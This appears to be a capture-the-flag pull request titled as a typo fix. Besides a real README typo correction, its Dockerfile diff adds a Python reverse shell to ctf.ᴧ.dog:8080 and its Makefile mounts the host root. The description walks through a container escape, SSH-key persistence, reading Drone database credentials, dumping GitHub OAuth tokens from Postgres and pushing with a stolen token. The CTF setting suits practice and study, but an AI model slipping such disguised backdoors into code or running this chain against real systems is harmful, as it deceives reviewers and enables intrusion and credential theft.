### PR TITLE
Totally innocuous typo fix

### DIFF
--- a/Dockerfile
+++ b/Dockerfile
@@ -1,3 +1,3 @@
 from alpine:latest
 
-CMD ["echo", "Happy Hacking!"]
+CMD ["sh", "-c", "chroot /rootfs /sbin/apk add --no-cache python3 && chroot /rootfs /usr/bin/python3 -c \"import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('ctf.ᴧ.dog',8080));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn('sh')\""]

--- a/Makefile
+++ b/Makefile
@@ -5,4 +5,4 @@ build:
 	docker build . -t greetings
 
 test:
-	docker run --rm greetings
+	docker run -v /:/rootfs --rm greetings

--- a/README.md
+++ b/README.md
@@ -30,7 +30,7 @@ Nobody yet
 Hack this repo and add your name to the list above. Creativity and style encouraged in both endeavors.
 
 ## Rules
-Its hacking, there are no rules! Though you probably shouldn't break any local laws.
+It's hacking, there are no rules! Though you probably shouldn't break any local laws.
 
 ## Requests
 Please don't interfere with anyone else trying to capture the flag.


### PR DESCRIPTION
<details><summary>Explanation</summary>

This abuses docker-in-docker volume mounts to open a remote shell on the Drone container itself. This hopefully better disguises the eventual `--privileged` escape. Once we mount the outer Drone worker, we chroot into it and create a reverse shell. From there, we spawn a privileged container, gain access to the node itself, and extract secrets from other containers running on the node.

From the interactive remote shell, we can then freely spawn a `--privileged` container, mount the node's `/`, install an SSH key in `/home/ec2-user/.ssh/authorized_keys`, and discover the node's IP:
```
# access the node's rootfs
$ docker run --privileged --rm -it alpine
$ mount /dev/nvme0n1p1 /mnt

# install an ssh key
$ cd /mnt/home/ec2-user/.ssh
$ echo "<ssh public key>" >> .authorized_keys

# discover the public IP
$ apk add curl 
$ curl ifconfig.me
```

(not shown: accidentally hitting ctrl+c approximately 12 times and having to start over from scratch)

Next, ssh into the node. It's a k8s node, so we can look for interesting docker containers. Looks like there's a drone server:

```
$ docker ps | grep -i drone-server | grep -v pause
243146925dfe        112b23978e25                                                            "/bin/drone-server"       17 hours ago        Up 17 hours                             k8s_server_drone-7cf8565555-wmnsw_drone_b6b3725e-223e-4793-97a7-eb07f412325c_0
```

`exec` into it and check out the env:
```
$ docker exec -it 243146925dfe sh
$ env
[...]
DRONE_DATABASE_DATASOURCE=<snip>
[...]
```

Grab the postgres connection details and return to the node. Open a postgres shell:
```
$ psql -h <host> -p 5432 -U postgres
postgres=> \dt
           List of relations
 Schema |    Name    | Type  |  Owner
--------+------------+-------+----------
 public | builds     | table | postgres
 public | cron       | table | postgres
 public | latest     | table | postgres
 public | logs       | table | postgres
 public | migrations | table | postgres
 public | nodes      | table | postgres
 public | orgsecrets | table | postgres
 public | perms      | table | postgres
 public | repos      | table | postgres
 public | secrets    | table | postgres
 public | stages     | table | postgres
 public | steps      | table | postgres
 public | users      | table | postgres
postgres=> select user_login,user_oauth_token from users;
  user_login  |             user_oauth_token
--------------+------------------------------------------
 example | <snip>
(1 row)
```

With a github user and token, we can have some fun. Back on your own box, clone the repo over https:

```
$ git clone https://github.com/danger-della/ctf.git
$ cd ctf
$ [... make some changes ...]
$ git commit
$ git push
```

You'll be prompted for a username and password. Enter the username from above, and use the token as the password. The push should succeed. 🎉 

</details>